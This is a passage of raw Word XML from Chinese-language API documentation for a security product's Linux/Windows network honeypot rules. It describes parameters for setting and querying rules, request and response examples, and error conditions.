          <w:p w14:paraId="0DE2458F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C9344B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78BFB1B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D118AC6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>范围，0:全部主机 1:自定义，包括业务组和主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7BA373DD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B3A7AAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D80BED8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F2664AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EF0EC3A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组列表，如果</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=1, 则</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>和groups至少有一个不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="508FAE26" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48A0DCCC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E434D28" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56F3E992" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66547169" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机列表，如果</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=1, 则</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>和groups至少有一个不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="54D3D95C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3318BBF3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56EF3271" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="316EF8BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09491C6B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口列表（端口个数不能超过5个）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E4689DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5323F59F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/honeypot/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2592A4C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C88C90" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C5261C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B53EA0C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>范围参数不合法，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D469B28" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>范围为自定义范围时，业务组和主机同时为空，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BB54B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>端口为空，或端口数量大于5，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AD4AF0"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BC669E" w14:paraId="2E7C2DF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420D951" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B3DC321" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B73A680" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EC74A5A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="75AC0E2D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CFC63AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2988C2DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EA831AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1586F685" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>true:成功 false:失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64A8C796" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="337" w:name="_Toc115166241"/>
      <w:bookmarkStart w:id="338" w:name="查询规则"/>
      <w:bookmarkEnd w:id="336"/>
      <w:r>
        <w:t>查询规则</w:t>
      </w:r>
      <w:bookmarkEnd w:id="337"/>
    </w:p>
    <w:p w14:paraId="39FDAD6B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux/Windows网络蜜罐规则的数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F2B93D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B92B0F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/honeypot/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux,win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>}/rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B5A661"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888"/>
        <w:gridCol w:w="904"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="834"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="554E46A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EBCBF76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A0A051B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D72C4BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46F237AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="23396092" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36F962F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18565F98" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="449E1718" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FE8DB7E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="597EBBB8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B3A74D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CA03D1C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A55243A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F5BA2BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DF46F3D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555C587E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/detect/honeypot/linux/rule?page=0&amp;size=50&amp;groups=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BBB1D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A162D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "70db8ef89e9ae79a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.159.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.159.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "未分组主机（Linux）",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "安装了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DNSmasq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "hostname",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "status": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>verifyStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "ports": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "port": 80,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "status": 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "port": 8000,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "status": 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "port": 8080,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "status": 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B588EC5"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452"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="3451"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="79CB263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F69E0CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BE1EC05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75284398" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24B61EDF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="450D30B6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="018586E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A947ED0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DD1F54A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6ABBE355" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7E20D5A7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2612811F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EF05549" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
